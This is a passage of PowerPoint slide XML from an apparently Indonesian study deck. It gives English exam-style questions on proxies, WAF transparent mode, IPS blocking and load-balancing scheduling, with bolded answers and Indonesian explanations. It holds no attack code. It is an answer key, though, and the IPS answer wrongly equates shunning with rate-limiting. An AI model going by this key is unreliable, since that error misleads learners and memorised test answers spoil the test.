            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. A proxy server implements a gateway for employee web and email access and is regularly monitored for compromise. If any compromise is detected, the proxy must enter a fail state that prevents further access. What type of fail mode is required?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Fail-closed.</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b="1" dirty="0"/>
              <a:t>Fail-closed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/dikompr0mis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (default deny).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Fail-open:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diteruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web/email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>fail-closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. You need to deploy an appliance WAF to protect a web server farm without making any layer 3 addressing changes. Is WAF functionality supported by appliances and, if so, what device attribute should the appliance support?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Yes, via transparent mode (bridge mode).</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dirty="0"/>
              <a:t>Appliance WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di-deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>inline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (bridge mode) → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> addressing layer 3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>transparent/inline deployment mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAF duduk di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> client &amp; server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What IPS mechanism can be used to block traffic that violates policy without also blocking the traffic source?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Traffic rate-limiting (shunning) or TCP reset (session termination).</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dirty="0"/>
              <a:t>IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>session-based blocking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> reset TCP connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> traffic yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanggar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihentikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. True or false? When deploying a non-transparent proxy, clients must be configured with the proxy address and port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>True.</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b="1" dirty="0"/>
              <a:t>Non-transparent proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/port proxy dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> via PAC/WPAD file).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Transparent proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di client, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> redirection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (router/firewall).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>6. What is meant by scheduling in the context of load balancing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>The algorithm or policy used to decide how client requests are distributed across multiple servers.</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b="1" dirty="0"/>
              <a:t>Scheduling = load balancing algorithm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Round robin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergiliran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Least connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (server paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Weighted load balancing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>porsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>performa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> &amp; reliability.</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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178061996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Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
